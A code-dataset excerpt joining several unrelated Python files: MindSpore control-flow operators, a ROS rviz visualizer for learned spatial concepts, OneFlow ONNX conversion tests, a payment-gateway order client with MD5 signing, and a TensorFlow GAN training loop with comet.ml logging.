>>> class Net(nn.Cell):
>>> def __init__(self):
>>> super(Net, self).__init__()
>>> self.square = P.Square()
>>> self.add = P.TensorAdd()
>>> self.value = Tensor(np.full((1), 3), mindspore.float32)
>>> self.switch = P.GeSwitch()
>>> self.merge = P.Merge()
>>> self.less = P.Less()
>>>
>>> def construct(self, x, y):
>>> cond = self.less(x, y)
>>> st1, sf1 = self.switch(x, cond)
>>> st2, sf2 = self.switch(y, cond)
>>> add_ret = self.add(st1, st2)
>>> st3, sf3 = self.switch(self.value, cond)
>>> sq_ret = self.square(sf3)
>>> ret = self.merge((add_ret, sq_ret))
>>> return ret[0]
>>>
>>> x = Tensor(10.0, dtype=mindspore.float32)
>>> y = Tensor(5.0, dtype=mindspore.float32)
>>> net = Net()
>>> output = net(x, y)
"""
@prim_attr_register
def __init__(self):
"""init"""
def __call__(self, data, pred):
raise NotImplementedError
def infer_shape(self, data, pred):
validator.check_equal_int(len(pred), 0, "pred rank", self.name)
return (data, data)
def infer_dtype(self, data_type, pred_type):
validator.check_subclass(
"data", data_type, (mstype.tensor,) + mstype.number_type, self.name)
validator.check_tensor_type_same(
{"pred": pred_type}, [mstype.bool_], self.name)
return (data_type, data_type)
class Merge(PrimitiveWithInfer):
"""
Merges all input data to one.
One and only one of the inputs must be selected as the output
Inputs:
- **inputs** (Union(Tuple, List)) - The data to be merged. All tuple elements must have the same data type.
Outputs:
tuple. Output is tuple(`data`, `output_index`). The `data` has the same shape of `inputs` element.
Examples:
>>> merge = P.Merge()
>>> input_x = Tensor(np.linspace(0, 8, 8).reshape(2, 4), mindspore.float32)
>>> input_y = Tensor(np.random.randint(-4, 4, (2, 4)), mindspore.float32)
>>> result = merge((input_x, input_y))
"""
@prim_attr_register
def __init__(self):
"""init"""
def __call__(self, *args):
raise NotImplementedError
def infer_shape(self, inputs):
return (inputs[0], [1])
def infer_dtype(self, inputs):
args = {}
for i, item in enumerate(inputs):
args['inputs[%d]' % i] = item
validator.check_scalar_or_tensor_type_same(args, (mstype.bool_,) + mstype.number_type, self.name)
return (inputs[0], mstype.int32)
| 39.198864 | 119 | 0.610233 |
acdf9006e7c416286a25c22dcfbf4bc60872a84b | 13,299 | py | Python | scripts/spatial_concepts_visualizer.py | Shoichi-Hasegawa0628/spconavi_ros | 8b627ac7a85e358d5ef921f0345ffbcdef0be63f | [
"MIT"
] | null | null | null | scripts/spatial_concepts_visualizer.py | Shoichi-Hasegawa0628/spconavi_ros | 8b627ac7a85e358d5ef921f0345ffbcdef0be63f | [
"MIT"
] | null | null | null | scripts/spatial_concepts_visualizer.py | Shoichi-Hasegawa0628/spconavi_ros | 8b627ac7a85e358d5ef921f0345ffbcdef0be63f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# 学習した場所領域のサンプルをrviz上に可視化するプログラム
# 標準ライブラリ
import math
import sys
# サードパーティー
import rospy
import geometry_msgs.msg as gm
from geometry_msgs.msg import Point
import sensor_msgs.msg as sm
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
import numpy as np
sys.path.append("lib/")
# 自作ライブラリ
from __init__ import *
# 自作ファイル
# import file_read as f_r
# from SBP import read_result
# 実験ファイル名trialnameを取得
# trialname = sys.argv[1]
trialname = rospy.get_param('trialname')
print trialname
# iterationを要求
# iteration = sys.argv[2] #1
iteration = rospy.get_param('iteration')
# sampleを要求
# sample = sys.argv[3] #0
sample = rospy.get_param('sample')
##FullPath of folder
filename = outputfolder_SIG + trialname # + "/"
print filename, iteration, sample
outputfile = filename + navigation_folder # outputfolder + trialname + navigation_folder
# outputname = outputfile + "T"+str(T_horizon)+"N"+str(N_best)+"A"+str(Approx)+"S"+str(init_position_num)+"G"+str(speech_num)
maxparticle = 0
i = 0
##datafolder+trialname+"/"+stepにおける最大尤度のパーティクルを読み込み
# for line in open( filename + 'weights.csv', 'r'):
# #itemList = line[:].split(',')
# if (i == 0):
# maxparticle = int(line)
# i +=1
# maxparticle = int(sys.argv[3])
# filename=sys.argv[1]
# Class_NUM=0#read_result(filename)
RAD_90 = math.radians(90)
color_all = 1 # 1 or 0 、(0ならばすべて赤)
mu_draw = 1 # 1 or 0 、(0ならば中心値を表示しない)
sigma_draw = 1 # 1 or 0, (0ならば分散を表示しない)
mu_arrow = 0 # 矢印を可視化する場合
COLOR = [
[1, 0, 0], [0, 1, 0], [0, 0, 1], [0.5, 0.5, 0], [0.5, 0, 0.5], # 4
[0, 0.5, 0.5], [0.8, 0.1, 0.1], [0.1, 0.8, 0.1], [0.1, 0.1, 0.8], [0.6, 0.2, 0.2], # 9
[0.2, 0.6, 0.2], [0.2, 0.2, 0.6], [0.4, 0.3, 0.3], [0.3, 0.4, 0.3], [0.3, 0.3, 0.4], # 14
[0.7, 0.2, 0.1], [0.7, 0.1, 0.2], [0.2, 0.7, 0.1], [0.1, 0.7, 0.2], [0.2, 0.1, 0.7], # 19
[0.1, 0.2, 0.7], [0.5, 0.2, 0.3], [0.5, 0.3, 0.2], [0.3, 0.5, 0.2], [0.2, 0.5, 0.3], # 24
[0.3, 0.2, 0.5], [0.2, 0.3, 0.5], [0.7, 0.15, 0.15], [0.15, 0.7, 0.15], [0.15, 0.15, 0.7], # 29
[0.6, 0.3, 0.1], [0.6, 0.1, 0.3], [0.1, 0.6, 0.3], [0.3, 0.6, 0.1], [0.3, 0.1, 0.6], # 34
[0.1, 0.3, 0.6], [0.8, 0.2, 0], [0.8, 0, 0.2], [0.2, 0.8, 0], [0, 0.8, 0.2], # 39
[0.2, 0, 0.8], [0, 0.2, 0.8], [0.7, 0.3, 0], [0.7, 0, 0.3], [0.3, 0.7, 0.0], # 44
[0.3, 0, 0.7], [0, 0.7, 0.3], [0, 0.3, 0.7], [0.25, 0.25, 0.5], [0.25, 0.5, 0.25], # 49
[1, 0, 0], [0, 1, 0], [0, 0, 1], [0.5, 0.5, 0], [0.5, 0, 0.5], # 54
[0, 0.5, 0.5], [0.8, 0.1, 0.1], [0.1, 0.8, 0.1], [0.1, 0.1, 0.8], [0.6, 0.2, 0.2], # 59
[0.2, 0.6, 0.2], [0.2, 0.2, 0.6], [0.4, 0.3, 0.3], [0.3, 0.4, 0.3], [0.3, 0.3, 0.4], # 64
[0, 7, 0.2, 0.1], [0.7, 0.1, 0.2], [0.2, 0.7, 0.1], [0.1, 0.7, 0.2], [0.2, 0.1, 0.7], # 69
[0.1, 0.2, 0.7], [0.5, 0.2, 0.3], [0.5, 0.3, 0.2], [0.3, 0.5, 0.2], [0.2, 0.5, 0.3], # 74
[0.3, 0.2, 0.5], [0.2, 0.3, 0.5], [0.7, 0.15, 0.15], [0.15, 0.7, 0.15], [0.15, 0.15, 0.7], # 79
[0.6, 0.3, 0.1], [0.6, 0.1, 0.3], [0.1, 0.6, 0.3], [0.3, 0.6, 0.1], [0.3, 0.1, 0.6], # 84
[0.1, 0.3, 0.6], [0.8, 0.2, 0], [0.8, 0, 0.2], [0.2, 0.8, 0], [0, 0.8, 0.2], # 89
[0.2, 0, 0.8], [0, 0.2, 0.8], [0.7, 0.3, 0], [0.7, 0, 0.3], [0.3, 0.7, 0.0], # 94
[0.3, 0, 0.7], [0, 0.7, 0.3], [0, 0.3, 0.7], [0.25, 0.25, 0.5], [0.25, 0.5, 0.25] # 99
]
# 特定の番号のガウス分布のみ描画したいとき
try:
Number = None # int(sys.argv[3])
except IndexError:
Number = None
# 石伏さんはハイパーパラメータの値をパラメータ.txtに保持しているため、以下の処理をしている
# env_para=np.genfromtxt(filename+"/パラメータ.txt",dtype= None,delimiter =" ")
# Class_NUM=int(env_para[4][1])
class SpatialConceptsVisualizer():
def __init__(self):
pass
"""
def read_result(self, filename):
file_dir = os.chdir(filename)
f = open('SBP.txt')
line = f.readline() # 1行を文字列として読み込む(改行文字も含まれる)
place_num = int(line)
return place_num
"""
def mu_read(self, filename):
all_mu = []
# fp = open(filename+'mu'+maxparticle+".csv", "r") # check
# convert = lambda text: int(text) if text.isdigit() else text
# alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
# file.sort(key=alphanum_key)
# for f in file:
K = 0
for line in open(filename + "/" + trialname + '_Myu_' + str(iteration) + '_' + str(sample) + '.csv',
'r'): # .readlines()
mu = [] # (x,y,sin,cos)
# readlines()は,ファイルを全て読み込み、1行毎に処理を行う
# print line
data = line[:].split(',')
mu += [float(data[0])]
mu += [float(data[1])]
mu += [0] # float(data[2])]
mu += [0] # float(data[3])]
# print position
all_mu.append(mu)
K += 1
return all_mu, K
def sigma_read(self, filename):
all_sigma = []
# file = glob.glob(filename+'/parameter3/sigma/*.txt') # check
# convert = lambda text: int(text) if text.isdigit() else text
# alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
# file.sort(key=alphanum_key)
for line in open(filename + "/" + trialname + '_S_' + str(iteration) + '_' + str(sample) + '.csv', 'r'):
# sigma=[] #(x,y,sin,cos)
data = line[:].split(',')
sigma = [[float(data[0]), float(data[1]), 0, 0], [float(data[2]), float(data[3]), 0, 0], [0, 0, 0, 0],
[0, 0, 0, 0]]
# readlines()は,ファイルを全て読み込み、1行毎に処理を行う
# line=open(f, 'r').readlines()
# i = 0
# for l in line:
# sigma_l.append(float(data[0]))
# sigma_l.append(float(data[1]))
# sigma_l.append(float(data[2]))
# sigma_l.append(float(data[3]))
#
# sigma.append(sigma_l)
#
all_sigma.append(sigma)
return all_sigma
"""
def sampling_read(self, filename, class_num):
c_all_position=[]
for c in range(class_num):
all_position=[] #すべての自己位置データのリスト
file = glob.glob(filename+'/sampling_data3/class'+repr(c)+'/*.txt') # check
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
file.sort(key=alphanum_key)
#print file
for f in file:
position=[] #(x,y,sin,cos)
line=open(f, 'r').readlines()
#print line
data=line[0][:].split(',')
position +=[float(data[0])]
position +=[float(data[1])]
position +=[float(data[2])]
position +=[float(data[3])]
#print position
all_position.append(position)
c_all_position.append(all_position)
return c_all_position
"""
"""
#=============各場所領域に割り当てられているデータの読みこみ===================
def class_check(self):
Class_list=[]
for i in range(Class_NUM):
#f=filename+"/parameter3/class/class"+repr(i)+".txt" # check
data=[]
# default(エラー)
#for line in open(f,'r').readlines():
# print str(line) + "\n\n"
# data.append(int(line))
#for line in open(f, 'r'):
# print "読み込み完了"
#replaceを使えば簡単にできる
#line1=line.split('[') # 始めの"["を除く
#line1=line1[1].split(']') # 終わりの"["を除く
#line2=line1[0]
#print "\nline2:" + str(line2) + "\n"
# 場所クラスに中身があるときはtry、中身がないときはexceptに移動
#try:
# data = [int(item) for item in line2.split(',')]
#except ValueError:
# data = []
#c=[]
#for item in data:
# print item
# try:
# num=int(item)
# c.append(num)
# except ValueError:
# pass
Class_list.append(data)
return Class_list
"""
def place_draw(self):
# 場所のクラスの割り当てられていない場合は省く→CRPでは割り当てられていないデータは存在しない
# class_list=class_check()
# print class_list
pub = rospy.Publisher('draw_space', MarkerArray, queue_size=10)
rospy.init_node('draw_spatial_concepts', anonymous=True)
rate = rospy.Rate(10) # 10hz
# 最大尤度のパーティクルのmuとsigを読み込み
mu_all, Class_NUM = self.mu_read(filename)
sigma = self.sigma_read(filename)
# sample = sampling_read(filename, Class_NUM)
# print "sigma: ",sigma
data_class = [i for i in xrange(Class_NUM)]
# for n in range(Class_NUM):
# #if len(class_list[n])!=0:
# data_class.append(n)
marker_array = MarkerArray()
id = 0
for c in data_class:
# 場所領域の中心値を示す場合
# ===場所領域の範囲の可視化====================
if sigma_draw == 1:
marker = Marker()
marker.type = Marker.CYLINDER
(eigValues, eigVectors) = np.linalg.eig(sigma[c])
angle = (math.atan2(eigVectors[1, 0], eigVectors[0, 0]))
marker.scale.x = 2 * math.sqrt(eigValues[0])
marker.scale.y = 2 * math.sqrt(eigValues[1])
marker.pose.orientation.w = math.cos(angle * 0.5)
marker.pose.orientation.z = math.sin(angle * 0.5)
marker.scale.z = 0.01 # default: 0.05
marker.color.a = 0.3
marker.header.frame_id = 'map'
marker.header.stamp = rospy.get_rostime()
marker.id = id
id += 1
marker.action = Marker.ADD
marker.pose.position.x = mu_all[c][0]
marker.pose.position.y = mu_all[c][1]
marker.color.r = COLOR[c][0] # default: COLOR[c][0] 色のばらつきを広げる
marker.color.g = COLOR[c][1] # default: COLOR[c][1] 色のばらつきを広げる
marker.color.b = COLOR[c][2] # default: COLOR[c][2] 色のばらつきを広げる
if Number != None:
if Number == c:
marker_array.markers.append(marker)
else:
marker_array.markers.append(marker)
if mu_draw == 1:
mu_marker = Marker()
if mu_arrow == 1: # 矢印を可視化する場合
mu_marker.type = Marker.ARROW
orient_cos = mu_all[c][3]
orient_sin = mu_all[c][2]
if orient_sin > 1.0:
orient_sin = 1.0
elif orient_sin < -1.0:
orient_sin = -1.0
# radian xを導出
radian = math.asin(orient_sin)
if orient_sin > 0 and orient_cos < 0:
radian = radian + RAD_90
elif orient_sin < 0 and orient_cos < 0:
radian = radian - RAD_90
mu_marker.pose.orientation.z = math.sin(radian / 2.0)
mu_marker.pose.orientation.w = math.cos(radian / 2.0)
# <<<<<<<矢印の大きさ変更>>>>>>>>>>>>>>>>>>>>>>>>
mu_marker.scale.x = 0.5 # default: 0.4
mu_marker.scale.y = 0.07 # default: 0.1
mu_marker.scale.z = 0.001 # default: 1.0
mu_marker.color.a = 1.0
elif mu_arrow == 0:
mu_marker.type = Marker.SPHERE
mu_marker.scale.x = 0.1
mu_marker.scale.y = 0.1
mu_marker.scale.z = 0.01 # default: 0.05
mu_marker.color.a = 1.0
mu_marker.header.frame_id = 'map'
mu_marker.header.stamp = rospy.get_rostime()
mu_marker.id = id
id += 1
mu_marker.action = Marker.ADD
mu_marker.pose.position.x = mu_all[c][0]
mu_marker.pose.position.y = mu_all[c][1]
# print c,mu_marker.pose.position.x,mu_marker.pose.position.y
if color_all == 1:
mu_marker.color.r = COLOR[c][0] # default: COLOR[c][0]
mu_marker.color.g = COLOR[c][1] # default: COLOR[c][1]
mu_marker.color.b = COLOR[c][2] # default: COLOR[c][2]
elif color_all == 0:
mu_marker.color.r = 1.0
mu_marker.color.g = 0
mu_marker.color.b = 0
if Number != None:
if Number == c:
marker_array.markers.append(mu_marker)
else:
marker_array.markers.append(mu_marker)
print marker_array.markers
while not rospy.is_shutdown():
# pub.publish(marker)
pub.publish(marker_array)
rate.sleep()
if __name__ == '__main__':
visualize_spatial_concepts = SpatialConceptsVisualizer()
try:
visualize_spatial_concepts.place_draw()
except rospy.ROSInterruptException:
pass | 36.737569 | 125 | 0.489661 |
acdf901ed89364049fe0a8e11c7d4edc8b442f28 | 5,525 | py | Python | oneflow/python/test/onnx/nodes/test_math.py | xxg1413/oneflow | f2e3c85a25b8aecfb6c0c0af1737833b1a77e135 | [
"Apache-2.0"
] | 1 | 2020-12-04T03:06:16.000Z | 2020-12-04T03:06:16.000Z | oneflow/python/test/onnx/nodes/test_math.py | xxg1413/oneflow | f2e3c85a25b8aecfb6c0c0af1737833b1a77e135 | [
"Apache-2.0"
] | null | null | null | oneflow/python/test/onnx/nodes/test_math.py | xxg1413/oneflow | f2e3c85a25b8aecfb6c0c0af1737833b1a77e135 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import oneflow as flow
from util import convert_to_onnx_and_check
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
def generate_binary_op_test(flow_op, *args, opset=None, **kwargs):
@flow.global_function(func_config)
def job1():
x = flow.get_variable(
name="x1",
shape=(2, 3, 4),
dtype=flow.float,
initializer=flow.random_uniform_initializer(-10, 10),
)
y = flow.get_variable(
name="y1",
shape=(1, 3, 1),
dtype=flow.float,
initializer=flow.random_uniform_initializer(-10, 10),
)
return flow_op(x, y, *args, **kwargs)
convert_to_onnx_and_check(job1, opset=opset)
def generate_unary_op_test(
flow_op, *args, opset=None, min_val=-10, max_val=10, **kwargs
):
@flow.global_function(func_config)
def job1():
x = flow.get_variable(
name="x1",
shape=(2, 3, 4),
dtype=flow.float,
initializer=flow.random_uniform_initializer(min_val, max_val),
)
return flow_op(x, *args, **kwargs)
convert_to_onnx_and_check(job1, opset=opset)
def test_mul(test_case):
generate_binary_op_test(flow.math.multiply)
def test_div(test_case):
generate_binary_op_test(flow.math.divide)
def test_sub(test_case):
generate_binary_op_test(flow.math.subtract)
def test_add(test_case):
generate_binary_op_test(flow.math.add)
def test_abs(test_case):
generate_unary_op_test(flow.math.abs)
def test_ceil(test_case):
generate_unary_op_test(flow.math.ceil)
def test_acos(test_case):
generate_unary_op_test(flow.math.acos, min_val=-1, max_val=1)
def test_asin(test_case):
generate_unary_op_test(flow.math.asin, min_val=-1, max_val=1)
def test_atan(test_case):
generate_unary_op_test(flow.math.atan, min_val=-1, max_val=1)
def test_acosh(test_case):
generate_unary_op_test(flow.math.acosh, min_val=1, max_val=100)
def test_asinh(test_case):
generate_unary_op_test(flow.math.asinh, min_val=-1, max_val=1)
def test_atanh(test_case):
generate_unary_op_test(flow.math.atanh, min_val=-1, max_val=1)
def test_sin(test_case):
generate_unary_op_test(flow.math.sin)
def test_cos(test_case):
generate_unary_op_test(flow.math.cos)
def test_tan(test_case):
generate_unary_op_test(flow.math.tan)
def test_sinh(test_case):
generate_unary_op_test(flow.math.sinh)
def test_cosh(test_case):
generate_unary_op_test(flow.math.cosh)
def test_tanh_v2(test_case):
generate_unary_op_test(flow.math.tanh_v2)
def test_tanh(test_case):
generate_unary_op_test(flow.math.tanh)
def test_erf(test_case):
generate_unary_op_test(flow.math.erf)
def test_log(test_case):
generate_unary_op_test(flow.math.log, min_val=0, max_val=100)
def test_floor(test_case):
generate_unary_op_test(flow.math.floor)
def test_reciprocal(test_case):
generate_unary_op_test(flow.math.reciprocal)
def test_round(test_case):
generate_unary_op_test(flow.math.round, opset=11)
def test_rsqrt(test_case):
generate_unary_op_test(flow.math.rsqrt, min_val=0, max_val=100)
def test_sigmoid_v2(test_case):
generate_unary_op_test(flow.math.sigmoid_v2)
def test_sigmoid(test_case):
generate_unary_op_test(flow.math.sigmoid)
def test_sign(test_case):
generate_unary_op_test(flow.math.sign)
def test_softplus(test_case):
generate_unary_op_test(flow.math.softplus)
def test_sigmoid(test_case):
generate_unary_op_test(flow.math.sigmoid)
def test_sqrt(test_case):
generate_unary_op_test(flow.math.sqrt, min_val=0, max_val=100)
def test_sqaure(test_case):
generate_unary_op_test(flow.math.square)
def test_maximum(test_case):
generate_binary_op_test(flow.math.maximum)
def test_minimum(test_case):
generate_binary_op_test(flow.math.minimum)
def test_equal(test_case):
generate_binary_op_test(flow.math.equal, opset=11)
def test_not_equal(test_case):
generate_binary_op_test(flow.math.not_equal, opset=11)
def test_less(test_case):
generate_binary_op_test(flow.math.less)
def test_greater(test_case):
generate_binary_op_test(flow.math.greater)
def test_less_equal(test_case):
generate_binary_op_test(flow.math.less_equal)
def test_greater_equal(test_case):
generate_binary_op_test(flow.math.greater_equal)
def test_squared_difference(test_case):
generate_binary_op_test(flow.math.squared_difference)
def test_cast(test_case):
generate_unary_op_test(flow.cast, dtype=flow.int32)
def test_scalar_mul_int(test_cast):
generate_unary_op_test(flow.math.multiply, 5)
def test_scalar_mul_float(test_cast):
generate_unary_op_test(flow.math.multiply, 5.1)
def test_scalar_add_int(test_cast):
generate_unary_op_test(flow.math.add, 5)
def test_scalar_add_float(test_cast):
generate_unary_op_test(flow.math.add, 5.1)
| 22.830579 | 74 | 0.745339 |
acdf90340477ffed411f44fe5c63f55f1b4e76bd | 2,396 | py | Python | service/util/pay/yunmq/ymq.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 717 | 2020-10-18T05:24:17.000Z | 2022-03-30T11:47:16.000Z | service/util/pay/yunmq/ymq.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 42 | 2020-10-22T15:37:22.000Z | 2022-02-27T04:52:27.000Z | service/util/pay/yunmq/ymq.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 267 | 2020-10-26T09:04:30.000Z | 2022-03-30T05:52:04.000Z | import requests
import hashlib
from urllib.parse import urlencode,unquote
class Ymq:
def __init__(self,payment='wechat'):
from service.util.pay.pay_config import get_config
# config = get_config('随便付')
self.web_url = get_config('web_url')
if payment == 'wechat':
config = get_config('云免签微信')
else:
config = get_config('云免签支付宝')
self.payment = payment
self.app_id = config['APP_ID'] #商户号
self.key = config['KEY']
self.API = 'https://open.yunmianqian.com/api/'
self.headers = {'content-type': 'application/x-www-form-urlencoded'}
def create_order(self,name,out_trade_no,total_price):
data = {
'app_id' : self.app_id, # 商户ID
'out_order_sn' : out_trade_no, # 订单号
'name' : name, # 1跳转 2json
'pay_way' : self.payment, # 个人收款码
'price' : int(total_price*100), # 金额,单位:分
'attach' :'kmfaka',
'notify_url':self.web_url + '/notify/ymq',
}
data['sign'] = hashlib.md5((data['app_id']+str(data['out_order_sn'])+str(data['name'])+str(data['pay_way']+str(data['price'])+str(data['attach'])+str(data['notify_url'])+self.key)).encode('utf8')).hexdigest()
# print(urlencode(order))
r = requests.post(self.API+'pay',data=data,headers=self.headers)
if r.status_code == 200:
if r.json()['code'] == 200:
res = r.json()['data']
return {'qr_code':res['qr'],'payjs_order_id':res['out_order_sn'],'reallyPrice':res['pay_price']/100,'redirect':2}
return False
def sign(self,data):
try:
return hashlib.md5((data['app_id']+str(data['order_sn'])+str(data['out_order_sn'])+str(data['notify_count'])+str(data['pay_way']+str(data['price'])+str(data['qr_type'])+str(data['qr_price'])+str(data['pay_price'])+str(data['created_at'])+str(data['paid_at'])+str(data['attach'])+str(data['server_time'])+self.key)).encode('utf8')).hexdigest()
except:
return None
def verify(self,data): #异步通知 这里data=request.from
try:
signature = data['sign']
data.pop('sign')
return signature == self.sign(data) # 结果为一个布尔值
except Exception as e:
print(e)
return False
# payjs = Payjs() | 43.563636 | 354 | 0.570117 |
acdf926928e7bf73f9551aa896bcab7d113b4f47 | 10,974 | py | Python | src/models/train_gan.py | ryanhausen/tensorflow_gan_setup | d599b324cdcabfe4aedc0e460a46df792717037e | [
"MIT"
] | null | null | null | src/models/train_gan.py | ryanhausen/tensorflow_gan_setup | d599b324cdcabfe4aedc0e460a46df792717037e | [
"MIT"
] | null | null | null | src/models/train_gan.py | ryanhausen/tensorflow_gan_setup | d599b324cdcabfe4aedc0e460a46df792717037e | [
"MIT"
] | null | null | null | # MIT License
# Copyright 2020 Ryan Hausen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# ofthis software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import os
import time
from functools import partial
from itertools import starmap
from multiprocessing import Pool
from typing import Callable, Dict, Iterator, List, Tuple, Union
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from astropy.io import fits
from tqdm import tqdm
import comet_ml
import gin
import gin.tf
import src.models.comet_utils as comet_utils
import src.models.tf_checkpoint_utils as tf_checkpoint_utils
TensorLike = Union[np.ndarray, tf.Tensor]
# ==============================================================================
# Special functions that need to be inplemented in the files that get imported
# ==============================================================================
DatasetFunc = Callable[
None,
[
Iterator[Union[TensorLike, List[TensorLike]]], # Training data
int, # number of training batches
Iterator[Union[TensorLike, List[TensorLike]]], # Test data
int, # number of testing batches
],
]
LossFunc = Callable[
[
Union[TensorLike, List[TensorLike]], # Data
Union[TensorLike, List[TensorLike]], # Generator out
Union[TensorLike, List[TensorLike]], # Discriminator out real
Union[TensorLike, List[TensorLike]], # Discriminator out fake
],
Union[float, tf.float32], # Loss to optimize
]
# The metric function takes the output from a training step and returns a
# dictionary of metrics where the key is the name of the metric and the
# the value is a Tuple, the first value is a string from one of three options
# ["float", "figure", "image"], the second value is the metric to be recorded
# which depending on the indicated type, will be recorded by comet.ml an
# example of a MetricFuncResult with a single entry could be the following:
# { "accuracy": ("float", 0.85)}
MetricFuncResult = Dict[str, Tuple[str, Union[float, plt.Figure, np.ndarray]]]
MetricFunc = Callable[
[
float, # epoch completion [0, 1.0]
Union[TensorLike, List[TensorLike]], # Data
Union[TensorLike, List[TensorLike]], # Generator out
Union[TensorLike, List[TensorLike]], # Discriminator out real
Union[TensorLike, List[TensorLike]], # Discriminator out fake
],
MetricFuncResult,
]
# ==============================================================================
@gin.configurable
def gan_training_func(
dataset_func: Callable,
generator: tf.keras.models.Model,
discriminator: tf.keras.models.Model,
generator_optimizer: tf.keras.optimizers.Optimizer,
discriminator_optimizer: tf.keras.optimizers.Optimizer,
generator_loss: LossFunc,
discriminator_loss: LossFunc,
train_metric_function: MetricFunc,
test_metric_function: MetricFunc,
checkpoint_dir: str,
max_checkpoints_to_keep: int,
epochs: int,
log_metric_batch_idx: int,
model_code_file: str,
comet_project_name: str,
comet_disabled: bool,
comet_experiment_key: str,
) -> None:
pass
experiment = comet_utils.setup_experiment(
comet_experiment_key,
comet_project_name,
config_str_to_dict(gin.config_str()),
model_code_file,
comet_disabled,
)
training_step = tf.Variable(0)
checkpoint_manager = tf_checkpoint_utils.setup_checkpoint_and_restore(
generator,
discriminator,
generator_optimizer,
discriminator_optimizer,
training_step,
checkpoint_dir,
experiment.get_key(),
max_checkpoints_to_keep,
)
(
training_data,
train_steps_per_epoch,
testing_data,
test_steps_per_epoch,
) = dataset_func()
train_step_f = partial(
_train_step_f,
generator,
discriminator,
generator_optimizer,
discriminator_optimizer,
generator_loss,
discriminator_loss
)
train_step = partial(
_step,
training_step,
train_step_f,
checkpoint_manager.save,
lambda batch_idx: batch_idx % log_metric_batch_idx == 0,
partial(
comet_utils.get_async_metric_logging_f,
experiment,
experiment.train,
),
train_metric_function,
train_steps_per_epoch,
)
test_step_f = partial(
_test_step_f,
generator,
discriminator,
)
test_step = partial(
_step,
training_step,
test_step_f,
lambda x: None,
lambda batch_idx: True,
partial(
comet_utils.get_async_metric_logging_f,
experiment,
experiment.test,
),
test_metric_function,
test_steps_per_epoch,
)
epoch_f = partial(
_epoch_f,
training_data,
train_steps_per_epoch,
train_step_f,
testing_data,
test_steps_per_epoch,
test_step_f
)
for _ in map(epoch_f, range(epochs)):
pass
def _train_step_f(
training_step: tf.Variable,
generator: tf.keras.models.Model,
discriminator: tf.keras.models.Model,
generator_optimizer: tf.keras.optimizers.Optimizer,
discriminator_optimizer: tf.keras.optimizers.Optimizer,
generator_loss: LossFunc,
discriminator_loss: LossFunc,
data: Union[TensorLike, List[TensorLike]],
) -> Tuple[Union[TensorLike, List[TensorLike]], Union[TensorLike, List[TensorLike]]]:
training_step.assign_add(1)
with tf.GradientTape() as gen_tape, tf.GradientTape() as dsc_tape:
generator_out = generator([data], training=True)
discriminator_out_real = discriminator([data], training=True)
discriminator_out_fake = discriminator([generator_out], training=True)
loss_g = generator_loss(
data, generator_out, discriminator_out_real, discriminator_out_fake
)
loss_d = discriminator_loss(
data, generator_out, discriminator_out_real, discriminator_out_fake
)
gen_grads = gen_tape.gradient(loss_g, generator.trainable_variables)
dsc_grads = dsc_tape.gradient(loss_d, discriminator.trainable_variables)
generator_optimizer.apply_gradients(zip(gen_grads, generator.trainable_variables))
discriminator_optimizer.apply_gradients(
zip(dsc_grads, discriminator.trainable_variables)
)
return generator_out, discriminator_out_real, discriminator_out_fake
def _test_step_f(
generator: tf.keras.models.Model,
discriminator: tf.keras.models.Model,
data: Union[TensorLike, List[TensorLike]],
) -> Tuple[Union[TensorLike, List[TensorLike]], Union[TensorLike, List[TensorLike]]]:
generator_out = generator([data])
discriminator_out_real = discriminator([data])
discriminator_out_fake = discriminator([generator_out])
return generator_out, discriminator_out_real, discriminator_out_fake
def _step(
training_step: tf.Variable,
step_f: Callable[
Union[TensorLike, List[TensorLike]],
Tuple[Union[TensorLike, List[TensorLike], Union[TensorLike, List[TensorLike]]]],
],
save_f: Callable[None, None],
should_log_metric: Callable[int, bool],
get_log_result_func: Callable[float, Callable[MetricFuncResult]],
metric_f: MetricFunc,
batches_in_dataset: int,
batch_idx: int,
data: Union[TensorLike, List[TensorLike]],
) -> int:
generator_out, discriminator_out_real, discriminator_out_fake = step_f(data)
if should_log_metric(batch_idx):
data_progress = batch_idx / batches_in_dataset
log_result_f = get_log_result_func(training_step.numpy())
metric_params = [
data_progress,
data,
generator_out,
discriminator_out_real,
discriminator_out_fake,
]
with Pool(1) as p:
p.apply_async(metric_f, metric_params, callback=log_result_f)
save_f()
return batch_idx
